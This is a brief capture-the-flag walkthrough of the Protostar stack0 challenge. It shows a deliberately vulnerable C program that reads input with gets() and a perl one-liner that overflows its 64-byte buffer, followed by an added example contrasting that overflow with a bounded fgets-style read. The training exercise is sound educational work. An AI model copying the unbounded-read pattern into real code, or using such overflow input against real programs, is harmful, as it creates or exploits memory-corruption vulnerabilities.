Protostar exploits stack0

Introduction

Protostar exploits are a cool bunch of CTF-type exercises that focus on Linux binary exploits that progressively get harder. An ISO containing the OS and challenges can be downloaded.

The website with all information and downloads is at https://exploit-exercises.com/protostar/

Challenge

Test run

user@protostar:~$ /opt/protostar/bin/stack0
test
Try again?

Exploit

Make the program respond with the message “you have changed the ‘modified’ variable”.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
    printf("you have changed the 'modified' variable\n");
  } else {
    printf("Try again?\n");
  }
}

We can see the challenge statement will be displayed if the ‘modified’ variable is not zero.

Can we corrupt the memory stack using the gets(buffer) call and overwrite the modified variable?

Let’s see

user@protostar:~$ perl -e 'print "A"x65'|/opt/protostar/bin/stack0
you have changed the 'modified' variable

Using perl we were able to overflow the 64-byte ‘buffer’ variable. We wrote 65 A’s to stdout, one byte more than was allocated, and that extra byte must have hit the ‘modified’ variable.

I won’t go into more detail because this was simple and the later challenges will take up more time.
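As an added example (not part of the original challenge or post), here is the overflow modelled next to a bounded read. The struct layout, with 'modified' sitting directly after the 64-byte buffer, is an assumption that mirrors what the test run above suggests, and the function names are hypothetical. It also shows that 64 bytes of input already writes one byte too many (the terminating NUL) but leaves 'modified' at zero.

```c
#include <stdio.h>
#include <string.h>

/* Assumed layout: models the frame the post observed, with 'modified'
   directly after the 64-byte buffer. Real layouts are compiler-dependent. */
struct frame {
    char buffer[64];
    int modified;
};

/* Mimics gets(): copies the whole line plus its NUL with no regard for
   sizeof(buffer). Capped at the struct size only so this model stays
   well-defined C. Returns the resulting value of 'modified'. */
int read_unbounded(const char *line)
{
    struct frame f;
    size_t n = strlen(line) + 1;          /* gets() also writes the NUL */
    memset(&f, 0, sizeof f);
    if (n > sizeof f)
        n = sizeof f;
    memcpy((char *)&f, line, n);          /* spills past buffer[63] */
    return f.modified;
}

/* Hardened form: never writes more than sizeof(buffer) bytes, the same
   bound fgets(buffer, sizeof buffer, stdin) would enforce. */
int read_bounded(const char *line)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    snprintf(f.buffer, sizeof f.buffer, "%s", line);
    return f.modified;
}

int main(void)
{
    char in64[65], in65[66];              /* constructed sample inputs */
    memset(in64, 'A', 64); in64[64] = '\0';
    memset(in65, 'A', 65); in65[65] = '\0';

    printf("unbounded, 64 bytes: modified=%d\n", read_unbounded(in64));
    printf("unbounded, 65 bytes: modified=%d\n", read_unbounded(in65));
    printf("bounded,   65 bytes: modified=%d\n", read_bounded(in65));
    return 0;
}
```

In the real program the fix is to replace gets(buffer) with fgets(buffer, sizeof buffer, stdin), which truncates the input instead of writing past the array.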

Thank you
